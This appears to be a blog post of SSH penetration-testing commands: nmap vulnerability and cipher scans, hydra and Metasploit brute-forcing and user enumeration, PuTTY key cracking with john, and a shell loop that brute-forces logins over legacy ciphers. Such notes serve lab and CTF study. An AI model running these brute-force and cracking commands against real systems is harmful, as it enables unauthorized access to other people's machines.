NMAP Commands
nmap -sCV -p22 10.10.10.10
#nmap Vuln scan
nmap -sC --script vuln,vulners -Pn -p22 10.10.10.10
#nmap Algorithm enum
#if you find CBC & HMAC in ciphers --> vulnerable
nmap -Pn -sS -sV -p 22 --script ssh2-enum-algos 10.10.10.10
Brute Forcing
hydra -L userx.txt -P wordlist.txt -v VICTIM_IP ssh
hydra -l username -P password_file.txt -s port ssh
Enum via Metasploit #User Enum --> works only on few old versions use auxiliary/scanner/ssh/ssh_enumusers #Version Detection use auxiliary/scanner/ssh/ssh_version #Brutefocing SSH use auxiliary/scanner/ssh/ssh_login #FTP Bruteforce use auxiliary/scanner/ftp/ftp_login
Cracking SSH Private Key.ppk sudo apt install putty-tools #Genrate id_rsa for ssg login, if it asks for password - Password needs to be cracked puttygen private.ppk -O private-openssh -o id_rsa putty2john private.ppk > hash john --format=PuTTY --fork=4 hash -w=wordlist.txt #Enter the cracked password puttygen private.ppk -O private-openssh -o id_rsa
RSH - Port 514
Older version of SSH; password cannot be used;
- Either user a private key or allow based on the hosts..
- Depricated
rsh root@10.10.10.10
OLD SSH Ciphers
ssh -oHostKeyAlgorithms=+ssh-dss root@10.10.10.10
#no matching host key type found. Their offer: ssh-rsa,ssh-dss
ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss root@10.10.10.10|
#Bruteforcing SSH using old ciphers
for username in $(cat /usr/share/wordlists/ssh_usernames.txt); do sshpass -p $username ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss $username@10.10.10.10 & done
Comments
Post a Comment